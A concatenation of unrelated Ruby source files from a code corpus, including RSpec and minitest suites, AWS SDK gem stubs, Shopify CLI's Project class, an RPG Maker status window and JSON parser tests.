:wBeginDay, :word, # Trigger beginning date day.
:wEndYear, :word, # Optional trigger ending date year.
:wEndMonth, :word, # Optional trigger ending date month.
:wEndDay, :word, # Optional trigger ending date day.
:wStartHour, :word, # Run bracket start time hour.
:wStartMinute, :word, # Run bracket start time minute.
:MinutesDuration, :dword, # Duration of run bracket.
:MinutesInterval, :dword, # Run bracket repetition interval.
:rgFlags, :dword, # Trigger flags.
:TriggerType, TASK_TRIGGER_TYPE, # Trigger type.
:Type, TRIGGER_TYPE_UNION, # Trigger data.
:Reserved2, :word, # Reserved. Must be zero.
:wRandomMinutesInterval, :word # Maximum number of random minutes after start time
end
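  # Illustrative helper (added example; not part of the original API):
  # builds a TASK_TRIGGER for a daily run, showing how the TriggerType
  # enum value selects the :Daily member of TRIGGER_TYPE_UNION. The
  # begin-date values below are placeholders.
  def self.example_daily_trigger
    trigger = TASK_TRIGGER.new
    trigger[:cbTriggerSize] = TASK_TRIGGER.size
    trigger[:wBeginYear]  = 2000 # placeholder begin date
    trigger[:wBeginMonth] = 1
    trigger[:wBeginDay]   = 1
    trigger[:TriggerType] = :TASK_TIME_TRIGGER_DAILY
    trigger[:Type][:Daily][:DaysInterval] = 1 # run every day
    trigger
  end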
end
end
| 36.48265 | 126 | 0.620147 |
382efd6b10db211a2461166e7f9eb8c62d801591 | 621 | require 'rails_helper'
RSpec.describe CollectionObjectObservation, type: :model, group: :collection_objects do
let(:collection_object_observation) { CollectionObjectObservation.new }
context 'validation' do
before {collection_object_observation.valid?}
specify 'data is required' do
expect(collection_object_observation.errors.include?(:data)).to be_truthy
end
end
specify 'data is not trimmed' do
s = " asdf sd \n asdfd \r\n"
collection_object_observation.data = s
collection_object_observation.valid?
expect(collection_object_observation.data).to eq(s)
end
end
| 27 | 87 | 0.747182 |
1d8573b89c4e3377e2a00e0d79d60cf6f9345eb8 | 336 | Refinery::Application.routes.draw do
scope(:path => 'refinery', :as => 'admin', :module => 'admin') do
match 'dashboard',
:to => 'dashboard#index',
:as => :dashboard
match 'disable_upgrade_message',
:to => 'dashboard#disable_upgrade_message',
:as => :disable_upgrade_message
end
end
| 28 | 67 | 0.60119 |
e833564e2ebc69a39caa16c4fa4c61614d330802 | 1,453 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'aws-sdk-core'
require 'aws-sigv4'
require_relative 'aws-sdk-medialive/types'
require_relative 'aws-sdk-medialive/client_api'
require_relative 'aws-sdk-medialive/client'
require_relative 'aws-sdk-medialive/errors'
require_relative 'aws-sdk-medialive/waiters'
require_relative 'aws-sdk-medialive/resource'
require_relative 'aws-sdk-medialive/customizations'
# This module provides support for AWS Elemental MediaLive. This module is available in the
# `aws-sdk-medialive` gem.
#
# # Client
#
# The {Client} class provides one method for each API operation. Operation
# methods each accept a hash of request parameters and return a response
# structure.
#
# media_live = Aws::MediaLive::Client.new
# resp = media_live.accept_input_device_transfer(params)
#
# See {Client} for more information.
#
# # Errors
#
# Errors returned from AWS Elemental MediaLive are defined in the
# {Errors} module and all extend {Errors::ServiceError}.
#
# begin
# # do stuff
# rescue Aws::MediaLive::Errors::ServiceError
# # rescues all AWS Elemental MediaLive API errors
# end
#
# See {Errors} for more information.
#
# @!group service
module Aws::MediaLive
GEM_VERSION = '1.75.0'
end
| 26.418182 | 91 | 0.752237 |
3304ed19d7263c189a83617b76bc2a0dc35abf23 | 5,897 | # frozen_string_literal: true
require 'shopify_cli'
module ShopifyCli
##
# ShopifyCli::Project captures the current project that the user is working on.
# This class can be used to fetch and save project environment as well as the
# project config `.shopify-cli.yml`.
#
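  # A typical flow (illustrative):
  #
  #   project = ShopifyCli::Project.current
  #   project.config['project_type'] # => e.g. "node"
  #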
class Project
include SmartProperties
class << self
##
# will get an instance of the project that the user is currently operating
# on. This is used for access to project resources.
#
# #### Parameters
#
# * `force_reload` - whether to force a reload of the project files
#
# #### Returns
#
# * `project` - a Project instance if the user is currently in the project.
#
# #### Raises
#
# * `ShopifyCli::Abort` - If the cli is not currently in a project directory
# then this will be raised with a message implying that the user is not in
# a project directory.
#
# #### Example
#
# project = ShopifyCli::Project.current
#
def current(force_reload: false)
clear if force_reload
at(Dir.pwd)
end
##
# will return true if the command line is currently within a project
#
# #### Returns
#
# * `has_current?` - boolean, true if there is a current project
#
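      # #### Example
      #
      #   ShopifyCli::Project.has_current? # => true when run inside a project
      #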
def has_current?
!directory(Dir.pwd).nil?
end
##
# will fetch the project type of the current project. This is mostly used
# for internal project type loading, you should not normally need this.
#
# #### Returns
#
# * `type` - a symbol of the name of the project type identifier. i.e. [rails, node]
# This will be nil if the user is not in a current project.
#
# #### Example
#
# type = ShopifyCli::Project.current_project_type
#
def current_project_type
return unless has_current?
current.config['project_type'].to_sym
end
##
# writes out the `.shopify-cli.yml` file. You should use this when creating
# a project type so that the rest of your project type commands will load
# in this project, in the future.
#
# #### Parameters
#
# * `ctx` - the current running context of your command
# * `project_type` - a string or symbol of your project type name
# * `organization_id` - the id of the partner organization that the app is owned by. Used for metrics
# * `identifiers` - an optional hash of other app identifiers
#
# #### Example
#
      #   ShopifyCli::Project.write(ctx, project_type: 'node', organization_id: 42)
#
def write(ctx, project_type:, organization_id:, **identifiers)
require 'yaml' # takes 20ms, so deferred as late as possible.
content = Hash[{ project_type: project_type, organization_id: organization_id.to_i }
.merge(identifiers)
.collect { |k, v| [k.to_s, v] }]
content['shopify_organization'] = true if Shopifolk.acting_as_shopify_organization?
ctx.write('.shopify-cli.yml', YAML.dump(content))
clear
end
def project_name
File.basename(current.directory)
end
def clear
@at = nil
@dir = nil
end
private
def directory(dir)
@dir ||= Hash.new { |h, k| h[k] = __directory(k) }
@dir[dir]
end
def at(dir)
proj_dir = directory(dir)
unless proj_dir
raise(ShopifyCli::Abort, Context.message('core.project.error.not_in_project'))
end
@at ||= Hash.new { |h, k| h[k] = new(directory: k) }
@at[proj_dir]
end
def __directory(curr)
loop do
return nil if curr == '/' || /^[A-Z]:\/$/.match?(curr)
file = File.join(curr, '.shopify-cli.yml')
return curr if File.exist?(file)
curr = File.dirname(curr)
end
end
end
property :directory # :nodoc:
##
# will read, parse and return the envfile for the project
#
# #### Returns
#
# * `env` - An instance of a ShopifyCli::Resources::EnvFile
#
# #### Example
#
# ShopifyCli::Project.current.env
#
def env
@env ||= begin
Resources::EnvFile.read(directory)
rescue Errno::ENOENT
nil
end
end
##
# will read, parse and return the .shopify-cli.yml for the project
#
# #### Returns
#
# * `config` - A hash of configuration
#
# #### Raises
#
# * `ShopifyCli::Abort` - If the yml is invalid or poorly formatted
# * `ShopifyCli::Abort` - If the yml file does not exist
#
# #### Example
#
# ShopifyCli::Project.current.config
#
def config
@config ||= begin
config = load_yaml_file('.shopify-cli.yml')
unless config.is_a?(Hash)
raise ShopifyCli::Abort, Context.message('core.yaml.error.not_hash', '.shopify-cli.yml')
end
# The app_type key was deprecated in favour of project_type, so replace it
if config.key?('app_type')
config['project_type'] = config['app_type']
config.delete('app_type')
end
config
end
end
private
def load_yaml_file(relative_path)
f = File.join(directory, relative_path)
require 'yaml' # takes 20ms, so deferred as late as possible.
begin
YAML.load_file(f)
rescue Psych::SyntaxError => e
raise(ShopifyCli::Abort, Context.message('core.yaml.error.invalid', relative_path, e.message))
# rescue Errno::EACCES => e
# TODO
# Dev::Helpers::EaccesHandler.diagnose_and_raise(f, e, mode: :read)
rescue Errno::ENOENT
raise ShopifyCli::Abort, Context.message('core.yaml.error.not_found', f)
end
end
end
end
| 28.906863 | 107 | 0.583008 |
39e376ab634210e50280b3abadfaf6f4802a5be4 | 87 | class RfeedfinderSlice::Application < Merb::Controller
controller_for_slice
end | 17.4 | 54 | 0.793103 |
4a012cf0ae48163207313ff50a3f502c669e3263 | 5,087 | #==============================================================================
# ** Window_Status
#------------------------------------------------------------------------------
#  This window displays full status specs on the status screen.
#==============================================================================
class Window_Status < Window_Selectable
#--------------------------------------------------------------------------
# * Object Initialization
#--------------------------------------------------------------------------
def initialize(actor)
super(0, 0, Graphics.width, Graphics.height)
@actor = actor
refresh
activate
end
#--------------------------------------------------------------------------
# * Set Actor
#--------------------------------------------------------------------------
def actor=(actor)
return if @actor == actor
@actor = actor
refresh
end
#--------------------------------------------------------------------------
# * Refresh
#--------------------------------------------------------------------------
def refresh
contents.clear
draw_block1 (line_height * 0)
draw_horz_line(line_height * 1)
draw_block2 (line_height * 2)
draw_horz_line(line_height * 6)
draw_block3 (line_height * 7)
draw_horz_line(line_height * 13)
draw_block4 (line_height * 14)
end
#--------------------------------------------------------------------------
# * Draw Block 1
#--------------------------------------------------------------------------
def draw_block1(y)
draw_actor_name(@actor, 4, y)
draw_actor_class(@actor, 128, y)
draw_actor_nickname(@actor, 288, y)
end
#--------------------------------------------------------------------------
# * Draw Block 2
#--------------------------------------------------------------------------
def draw_block2(y)
draw_actor_face(@actor, 8, y)
draw_basic_info(136, y)
draw_exp_info(304, y)
end
#--------------------------------------------------------------------------
# * Draw Block 3
#--------------------------------------------------------------------------
def draw_block3(y)
draw_parameters(32, y)
draw_equipments(288, y)
end
#--------------------------------------------------------------------------
# * Draw Block 4
#--------------------------------------------------------------------------
def draw_block4(y)
draw_description(4, y)
end
#--------------------------------------------------------------------------
# * Draw Horizontal Line
#--------------------------------------------------------------------------
def draw_horz_line(y)
line_y = y + line_height / 2 - 1
contents.fill_rect(0, line_y, contents_width, 2, line_color)
end
#--------------------------------------------------------------------------
# * Get Color of Horizontal Line
#--------------------------------------------------------------------------
def line_color
color = normal_color
color.alpha = 48
color
end
#--------------------------------------------------------------------------
# * Draw Basic Information
#--------------------------------------------------------------------------
def draw_basic_info(x, y)
draw_actor_level(@actor, x, y + line_height * 0)
draw_actor_icons(@actor, x, y + line_height * 1)
draw_actor_hp(@actor, x, y + line_height * 2)
draw_actor_mp(@actor, x, y + line_height * 3)
end
#--------------------------------------------------------------------------
# * Draw Parameters
#--------------------------------------------------------------------------
def draw_parameters(x, y)
6.times {|i| draw_actor_param(@actor, x, y + line_height * i, i + 2) }
end
#--------------------------------------------------------------------------
# * Draw Experience Information
#--------------------------------------------------------------------------
def draw_exp_info(x, y)
s1 = @actor.max_level? ? "-------" : @actor.exp
s2 = @actor.max_level? ? "-------" : @actor.next_level_exp - @actor.exp
s_next = sprintf(Vocab::ExpNext, Vocab::level)
change_color(system_color)
draw_text(x, y + line_height * 0, 180, line_height, Vocab::ExpTotal)
draw_text(x, y + line_height * 2, 180, line_height, s_next)
change_color(normal_color)
draw_text(x, y + line_height * 1, 180, line_height, s1, 2)
draw_text(x, y + line_height * 3, 180, line_height, s2, 2)
end
#--------------------------------------------------------------------------
# * Draw Equipment
#--------------------------------------------------------------------------
def draw_equipments(x, y)
@actor.equips.each_with_index do |item, i|
draw_item_name(item, x, y + line_height * i)
end
end
#--------------------------------------------------------------------------
# * Draw Description
#--------------------------------------------------------------------------
def draw_description(x, y)
draw_text_ex(x, y, @actor.description)
end
end
| 40.373016 | 79 | 0.344211 |
08f09ce1fdabe8f3af8d0619637be242c2124572 | 444 | ENV['RAILS_ENV'] ||= 'test'
require_relative '../config/environment'
require 'rails/test_help'
#require 'minitest/reporters'
#Minitest::Reporters.use!
class ActiveSupport::TestCase
# Run tests in parallel with specified workers
parallelize(workers: :number_of_processors)
# Setup all fixtures in test/fixtures/*.yml for all tests in alphabetical order.
fixtures :all
# Add more helper methods to be used by all tests here...
end
| 27.75 | 82 | 0.754505 |
91812e937991159aae24ea315a0d264795e0ed7e | 1,160 | require_relative 'spec_helper'
describe Passenger do
after(:each) do
Passenger.destroy_all
end
describe 'attributes' do
it 'has data attributes from a migration file' do
joshua = Passenger.create(name: 'Josh RS', phone_num: '347 000 1111')
expect(joshua.name).to eq('Josh RS')
expect(joshua.phone_num).to eq('347 000 1111')
end
end
describe 'request_ride' do
it 'requests a ride as a passenger' do
joshua = Passenger.create(name: 'Josh RS', phone_num: '347 000 1111')
ride = joshua.request_ride('1000 Fake Pl.', '2000 Real St.', 20)
expect(ride.passenger).to eq(joshua)
expect(ride.pickup_loc).to eq('1000 Fake Pl.')
expect(ride.dropoff_loc).to eq('2000 Real St.')
expect(ride.fare).to eq(20)
end
end
describe 'recent_rides' do
it 'shows passenger\'s past rides' do
joshua = Passenger.create(name: 'Josh RS', phone_num: '347 000 1111')
ride1 = joshua.request_ride('1000 Fake Pl.', '2000 Real St.', 20)
ride2 = joshua.request_ride('2332 Fake Pl.', '3489 Real St.', 8)
expect(joshua.recent_rides).to include(ride1, ride2)
end
end
end | 30.526316 | 75 | 0.660345 |
e89d336196556ea95c3c9c38e4e1448f4284baa1 | 12,989 | #!/usr/bin/env ruby
# -*- coding: utf-8 -*-
require 'test/unit'
require File.join(File.dirname(__FILE__), 'setup_variant')
require 'stringio'
unless Array.method_defined?(:permutation)
begin
require 'enumerator'
require 'permutation'
class Array
def permutation
Permutation.for(self).to_enum.map { |x| x.project }
end
end
rescue LoadError
warn "Skipping permutation tests."
end
end
class TC_JSON < Test::Unit::TestCase
include JSON
def setup
@ary = [1, "foo", 3.14, 4711.0, 2.718, nil, [1,-2,3], false, true].map do
|x| [x]
end
@ary_to_parse = ["1", '"foo"', "3.14", "4711.0", "2.718", "null",
"[1,-2,3]", "false", "true"].map do
|x| "[#{x}]"
end
@hash = {
'a' => 2,
'b' => 3.141,
'c' => 'c',
'd' => [ 1, "b", 3.14 ],
'e' => { 'foo' => 'bar' },
'g' => "\"\0\037",
'h' => 1000.0,
'i' => 0.001
}
@json = '{"a":2,"b":3.141,"c":"c","d":[1,"b",3.14],"e":{"foo":"bar"},'\
'"g":"\\"\\u0000\\u001f","h":1.0E3,"i":1.0E-3}'
end
def test_construction
parser = JSON::Parser.new('test')
assert_equal 'test', parser.source
end
def assert_equal_float(expected, is)
assert_in_delta(expected.first, is.first, 1e-2)
end
def test_parse_simple_arrays
assert_equal([], parse('[]'))
assert_equal([], parse(' [ ] '))
assert_equal([nil], parse('[null]'))
assert_equal([false], parse('[false]'))
assert_equal([true], parse('[true]'))
assert_equal([-23], parse('[-23]'))
assert_equal([23], parse('[23]'))
assert_equal([0.23], parse('[0.23]'))
assert_equal([0.0], parse('[0e0]'))
assert_raises(JSON::ParserError) { parse('[+23.2]') }
assert_raises(JSON::ParserError) { parse('[+23]') }
assert_raises(JSON::ParserError) { parse('[.23]') }
assert_raises(JSON::ParserError) { parse('[023]') }
assert_equal_float [3.141], parse('[3.141]')
assert_equal_float [-3.141], parse('[-3.141]')
assert_equal_float [3.141], parse('[3141e-3]')
assert_equal_float [3.141], parse('[3141.1e-3]')
assert_equal_float [3.141], parse('[3141E-3]')
assert_equal_float [3.141], parse('[3141.0E-3]')
assert_equal_float [-3.141], parse('[-3141.0e-3]')
assert_equal_float [-3.141], parse('[-3141e-3]')
assert_raises(ParserError) { parse('[NaN]') }
assert parse('[NaN]', :allow_nan => true).first.nan?
assert_raises(ParserError) { parse('[Infinity]') }
assert_equal [1.0/0], parse('[Infinity]', :allow_nan => true)
assert_raises(ParserError) { parse('[-Infinity]') }
assert_equal [-1.0/0], parse('[-Infinity]', :allow_nan => true)
assert_equal([""], parse('[""]'))
assert_equal(["foobar"], parse('["foobar"]'))
assert_equal([{}], parse('[{}]'))
end
def test_parse_simple_objects
assert_equal({}, parse('{}'))
assert_equal({}, parse(' { } '))
assert_equal({ "a" => nil }, parse('{ "a" : null}'))
assert_equal({ "a" => nil }, parse('{"a":null}'))
assert_equal({ "a" => false }, parse('{ "a" : false } '))
assert_equal({ "a" => false }, parse('{"a":false}'))
assert_raises(JSON::ParserError) { parse('{false}') }
assert_equal({ "a" => true }, parse('{"a":true}'))
assert_equal({ "a" => true }, parse(' { "a" : true } '))
assert_equal({ "a" => -23 }, parse(' { "a" : -23 } '))
assert_equal({ "a" => -23 }, parse(' { "a" : -23 } '))
assert_equal({ "a" => 23 }, parse('{"a":23 } '))
assert_equal({ "a" => 23 }, parse(' { "a" : 23 } '))
assert_equal({ "a" => 0.23 }, parse(' { "a" : 0.23 } '))
assert_equal({ "a" => 0.23 }, parse(' { "a" : 0.23 } '))
end
if Array.method_defined?(:permutation)
def test_parse_more_complex_arrays
a = [ nil, false, true, "foßbar", [ "n€st€d", true ], { "nested" => true, "n€ßt€ð2" => {} }]
a.permutation.each do |perm|
json = pretty_generate(perm)
assert_equal perm, parse(json)
end
end
def test_parse_complex_objects
a = [ nil, false, true, "foßbar", [ "n€st€d", true ], { "nested" => true, "n€ßt€ð2" => {} }]
a.permutation.each do |perm|
s = "a"
orig_obj = perm.inject({}) { |h, x| h[s.dup] = x; s = s.succ; h }
json = pretty_generate(orig_obj)
assert_equal orig_obj, parse(json)
end
end
end
def test_parse_arrays
assert_equal([1,2,3], parse('[1,2,3]'))
assert_equal([1.2,2,3], parse('[1.2,2,3]'))
assert_equal([[],[[],[]]], parse('[[],[[],[]]]'))
end
def test_parse_values
assert_equal([""], parse('[""]'))
assert_equal(["\\"], parse('["\\\\"]'))
assert_equal(['"'], parse('["\""]'))
assert_equal(['\\"\\'], parse('["\\\\\\"\\\\"]'))
assert_equal(["\"\b\n\r\t\0\037"],
parse('["\"\b\n\r\t\u0000\u001f"]'))
for i in 0 ... @ary.size
assert_equal(@ary[i], parse(@ary_to_parse[i]))
end
end
def test_parse_array
assert_equal([], parse('[]'))
assert_equal([], parse(' [ ] '))
assert_equal([1], parse('[1]'))
assert_equal([1], parse(' [ 1 ] '))
assert_equal(@ary,
parse('[[1],["foo"],[3.14],[47.11e+2],[2718.0E-3],[null],[[1,-2,3]]'\
',[false],[true]]'))
assert_equal(@ary, parse(%Q{ [ [1] , ["foo"] , [3.14] \t , [47.11e+2]
, [2718.0E-3 ],\r[ null] , [[1, -2, 3 ]], [false ],[ true]\n ] }))
end
class SubArray < Array; end
class SubArray2 < Array
def to_json(*a)
{
JSON.create_id => self.class.name,
'ary' => to_a,
}.to_json(*a)
end
def self.json_create(o)
o.delete JSON.create_id
o['ary']
end
end
def test_parse_array_custom_class
res = parse('[]', :array_class => SubArray)
assert_equal([], res)
assert_equal(SubArray, res.class)
end
def test_parse_object
assert_equal({}, parse('{}'))
assert_equal({}, parse(' { } '))
assert_equal({'foo'=>'bar'}, parse('{"foo":"bar"}'))
assert_equal({'foo'=>'bar'}, parse(' { "foo" : "bar" } '))
end
class SubHash < Hash
end
class SubHash2 < Hash
def to_json(*a)
{
JSON.create_id => self.class.name,
}.merge(self).to_json(*a)
end
def self.json_create(o)
o.delete JSON.create_id
self[o]
end
end
def test_parse_object_custom_class
res = parse('{}', :object_class => SubHash2)
assert_equal({}, res)
assert_equal(SubHash2, res.class)
end
def test_generation_of_core_subclasses_with_new_to_json
obj = SubHash2["foo" => SubHash2["bar" => true]]
obj_json = JSON(obj)
obj_again = JSON(obj_json)
assert_kind_of SubHash2, obj_again
assert_kind_of SubHash2, obj_again['foo']
assert obj_again['foo']['bar']
assert_equal obj, obj_again
assert_equal ["foo"], JSON(JSON(SubArray2["foo"]))
end
def test_generation_of_core_subclasses_with_default_to_json
assert_equal '{"foo":"bar"}', JSON(SubHash["foo" => "bar"])
assert_equal '["foo"]', JSON(SubArray["foo"])
end
def test_generation_of_core_subclasses
obj = SubHash["foo" => SubHash["bar" => true]]
obj_json = JSON(obj)
obj_again = JSON(obj_json)
assert_kind_of Hash, obj_again
assert_kind_of Hash, obj_again['foo']
assert obj_again['foo']['bar']
assert_equal obj, obj_again
end
def test_parser_reset
parser = Parser.new(@json)
assert_equal(@hash, parser.parse)
assert_equal(@hash, parser.parse)
end
def test_comments
json = <<EOT
{
"key1":"value1", // eol comment
"key2":"value2" /* multi line
* comment */,
"key3":"value3" /* multi line
// nested eol comment
* comment */
}
EOT
assert_equal(
{ "key1" => "value1", "key2" => "value2", "key3" => "value3" },
parse(json))
json = <<EOT
{
"key1":"value1" /* multi line
// nested eol comment
/* illegal nested multi line comment */
* comment */
}
EOT
assert_raises(ParserError) { parse(json) }
json = <<EOT
{
"key1":"value1" /* multi line
// nested eol comment
closed multi comment */
and again, throw an Error */
}
EOT
assert_raises(ParserError) { parse(json) }
json = <<EOT
{
"key1":"value1" /*/*/
}
EOT
assert_equal({ "key1" => "value1" }, parse(json))
end
def test_backslash
data = [ '\\.(?i:gif|jpe?g|png)$' ]
json = '["\\\\.(?i:gif|jpe?g|png)$"]'
assert_equal json, JSON.generate(data)
assert_equal data, JSON.parse(json)
#
data = [ '\\"' ]
json = '["\\\\\""]'
assert_equal json, JSON.generate(data)
assert_equal data, JSON.parse(json)
#
json = '["/"]'
data = JSON.parse(json)
assert_equal ['/'], data
assert_equal json, JSON.generate(data)
#
json = '["\""]'
data = JSON.parse(json)
assert_equal ['"'], data
assert_equal json, JSON.generate(data)
json = '["\\\'"]'
data = JSON.parse(json)
assert_equal ["'"], data
assert_equal '["\'"]', JSON.generate(data)
end
def test_wrong_inputs
assert_raises(ParserError) { JSON.parse('"foo"') }
assert_raises(ParserError) { JSON.parse('123') }
assert_raises(ParserError) { JSON.parse('[] bla') }
assert_raises(ParserError) { JSON.parse('[] 1') }
assert_raises(ParserError) { JSON.parse('[] []') }
assert_raises(ParserError) { JSON.parse('[] {}') }
assert_raises(ParserError) { JSON.parse('{} []') }
assert_raises(ParserError) { JSON.parse('{} {}') }
assert_raises(ParserError) { JSON.parse('[NULL]') }
assert_raises(ParserError) { JSON.parse('[FALSE]') }
assert_raises(ParserError) { JSON.parse('[TRUE]') }
assert_raises(ParserError) { JSON.parse('[07] ') }
assert_raises(ParserError) { JSON.parse('[0a]') }
assert_raises(ParserError) { JSON.parse('[1.]') }
assert_raises(ParserError) { JSON.parse(' ') }
end
def test_nesting
assert_raises(JSON::NestingError) { JSON.parse '[[]]', :max_nesting => 1 }
assert_raises(JSON::NestingError) { JSON.parser.new('[[]]', :max_nesting => 1).parse }
assert_equal [[]], JSON.parse('[[]]', :max_nesting => 2)
too_deep = '[[[[[[[[[[[[[[[[[[[["Too deep"]]]]]]]]]]]]]]]]]]]]'
too_deep_ary = eval too_deep
assert_raises(JSON::NestingError) { JSON.parse too_deep }
assert_raises(JSON::NestingError) { JSON.parser.new(too_deep).parse }
assert_raises(JSON::NestingError) { JSON.parse too_deep, :max_nesting => 19 }
ok = JSON.parse too_deep, :max_nesting => 20
assert_equal too_deep_ary, ok
ok = JSON.parse too_deep, :max_nesting => nil
assert_equal too_deep_ary, ok
ok = JSON.parse too_deep, :max_nesting => false
assert_equal too_deep_ary, ok
ok = JSON.parse too_deep, :max_nesting => 0
assert_equal too_deep_ary, ok
assert_raises(JSON::NestingError) { JSON.generate [[]], :max_nesting => 1 }
assert_equal '[[]]', JSON.generate([[]], :max_nesting => 2)
assert_raises(JSON::NestingError) { JSON.generate too_deep_ary }
assert_raises(JSON::NestingError) { JSON.generate too_deep_ary, :max_nesting => 19 }
ok = JSON.generate too_deep_ary, :max_nesting => 20
assert_equal too_deep, ok
ok = JSON.generate too_deep_ary, :max_nesting => nil
assert_equal too_deep, ok
ok = JSON.generate too_deep_ary, :max_nesting => false
assert_equal too_deep, ok
ok = JSON.generate too_deep_ary, :max_nesting => 0
assert_equal too_deep, ok
end
def test_symbolize_names
assert_equal({ "foo" => "bar", "baz" => "quux" },
JSON.parse('{"foo":"bar", "baz":"quux"}'))
assert_equal({ :foo => "bar", :baz => "quux" },
JSON.parse('{"foo":"bar", "baz":"quux"}', :symbolize_names => true))
end
def test_load_dump
too_deep = '[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]'
assert_equal too_deep, JSON.dump(eval(too_deep))
assert_kind_of String, Marshal.dump(eval(too_deep))
assert_raises(ArgumentError) { JSON.dump(eval(too_deep), 19) }
assert_raises(ArgumentError) { Marshal.dump(eval(too_deep), 19) }
assert_equal too_deep, JSON.dump(eval(too_deep), 20)
assert_kind_of String, Marshal.dump(eval(too_deep), 20)
output = StringIO.new
JSON.dump(eval(too_deep), output)
assert_equal too_deep, output.string
output = StringIO.new
JSON.dump(eval(too_deep), output, 20)
assert_equal too_deep, output.string
end
def test_big_integers
json1 = JSON([orig = (1 << 31) - 1])
assert_equal orig, JSON[json1][0]
json2 = JSON([orig = 1 << 31])
assert_equal orig, JSON[json2][0]
json3 = JSON([orig = (1 << 62) - 1])
assert_equal orig, JSON[json3][0]
json4 = JSON([orig = 1 << 62])
assert_equal orig, JSON[json4][0]
json5 = JSON([orig = 1 << 64])
assert_equal orig, JSON[json5][0]
end
end
| 33.219949 | 98 | 0.571099 |
877ffe936be4a41b2490753b1d8f38779231f8e4 | 1,427 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'aws-sdk-core'
require 'aws-sigv4'
require_relative 'aws-sdk-iotwireless/types'
require_relative 'aws-sdk-iotwireless/client_api'
require_relative 'aws-sdk-iotwireless/client'
require_relative 'aws-sdk-iotwireless/errors'
require_relative 'aws-sdk-iotwireless/resource'
require_relative 'aws-sdk-iotwireless/customizations'
# This module provides support for AWS IoT Wireless. This module is available in the
# `aws-sdk-iotwireless` gem.
#
# # Client
#
# The {Client} class provides one method for each API operation. Operation
# methods each accept a hash of request parameters and return a response
# structure.
#
# io_t_wireless = Aws::IoTWireless::Client.new
# resp = io_t_wireless.associate_aws_account_with_partner_account(params)
#
# See {Client} for more information.
#
# # Errors
#
# Errors returned from AWS IoT Wireless are defined in the
# {Errors} module and all extend {Errors::ServiceError}.
#
# begin
# # do stuff
# rescue Aws::IoTWireless::Errors::ServiceError
# # rescues all AWS IoT Wireless API errors
# end
#
# See {Errors} for more information.
#
# @!group service
module Aws::IoTWireless
GEM_VERSION = '1.19.0'
end
| 26.425926 | 84 | 0.752628 |
33f0c983b8ac43b5833789759cc358b27b31ad79 | 697 | require 'rails_helper'
module DealRedemptions
RSpec.describe Admin::SettingsController, :type => :controller do
routes { DealRedemptions::Engine::routes }
let(:valid_session) { { admin_user_id: 1 } }
describe 'GET #index' do
before(:each) do
@user = FactoryGirl.create(:user)
get :index, nil, valid_session
end
it 'returns http success' do
expect(response).to be_success
end
it 'assigns @users to fetch users' do
expect(assigns(:users)).to match_array @user
end
it 'assigns @new_user to new user instance' do
expect(assigns(:new_user)).to be_a(DealRedemptions::User)
end
end
end
end
| 24.034483 | 67 | 0.642755 |
26607284cc95f6863ebef02f7ba7ccb2361cfd4a | 1,421 | =begin
#Tatum API
## Authentication <!-- ReDoc-Inject: <security-definitions> -->
OpenAPI spec version: 3.9.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.31
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for Tatum::TronTxInternalTransactions
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'TronTxInternalTransactions' do
before do
# run before each test
@instance = Tatum::TronTxInternalTransactions.new
end
after do
# run after each test
end
describe 'test an instance of TronTxInternalTransactions' do
it 'should create an instance of TronTxInternalTransactions' do
expect(@instance).to be_instance_of(Tatum::TronTxInternalTransactions)
end
end
describe 'test attribute "internal_tx_id"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "to_address"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "from_address"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 26.811321 | 102 | 0.736805 |
21a3290419cf05252a4494fd6569fea16f2d375e | 2,540 | require "helper"
require "inspec/resource"
require "inspec/resources/os"
# require 'inspec/plugin/v1/plugin_types/resource'
describe Inspec::Plugins::Resource do
let(:base) { Inspec::Plugins::Resource }
describe "#name" do
it "won't register a nil resource" do
Class.new(base) { name nil; }
_(Inspec::Resource.registry.keys).wont_include nil
_(Inspec::Resource.registry.keys).wont_include ""
end
it "will register a valid name" do
Class.new(base) { name "hello"; }
_(Inspec::Resource.registry["hello"]).wont_be :nil?
end
end
def create(&block)
# random_name = (0...50).map { (65 + rand(26)).chr }.join
random_name = "NotSoRandomName"
Class.new(base) do
name random_name
instance_eval(&block)
end
Inspec::Resource.registry[random_name]
end
describe "#desc" do
it "will register a description" do
expected = rand.to_s
_(create { desc expected }.desc).must_equal expected
end
it "can change the description" do
c = create { desc rand.to_s }
c.desc(x = rand.to_s)
_(c.desc).must_equal x
end
end
describe "#example" do
it "will register a description" do
expected = rand.to_s
_(create { example expected }.example).must_equal expected
end
it "can change the description" do
c = create { example rand.to_s }
c.example(x = rand.to_s)
_(c.example).must_equal x
end
end
describe "supported platform" do
def supports_meta(supports)
@old = Inspec::Resource.supports[:os]
Inspec::Resource.supports[:os] = supports
load_resource("os")
end
after do
Inspec::Resource.supports[:os] = @old
end
it "loads a profile which supports multiple families" do
m = supports_meta([
{ os_family: "windows" },
{ os_family: "unix" },
])
_(m.check_supports).must_equal true
Inspec::Resource.supports["os"] = nil
end
it "loads a profile which supports multiple names" do
m = supports_meta([
{ os_family: "windows", os_name: "windows_2000" },
{ os_family: "unix", os_name: "ubuntu" },
])
_(m.check_supports).must_equal true
Inspec::Resource.supports["os"] = nil
end
it "reject a profile which supports multiple families" do
m = supports_meta([
{ os_family: "windows" },
{ os_family: "redhat" },
])
_(m.check_supports).must_equal false
Inspec::Resource.supports["os"] = nil
end
end
end
| 26.185567 | 64 | 0.626378 |
e9d30bee915a9b7154e1e260fe1952907c6294f0 | 985 | #
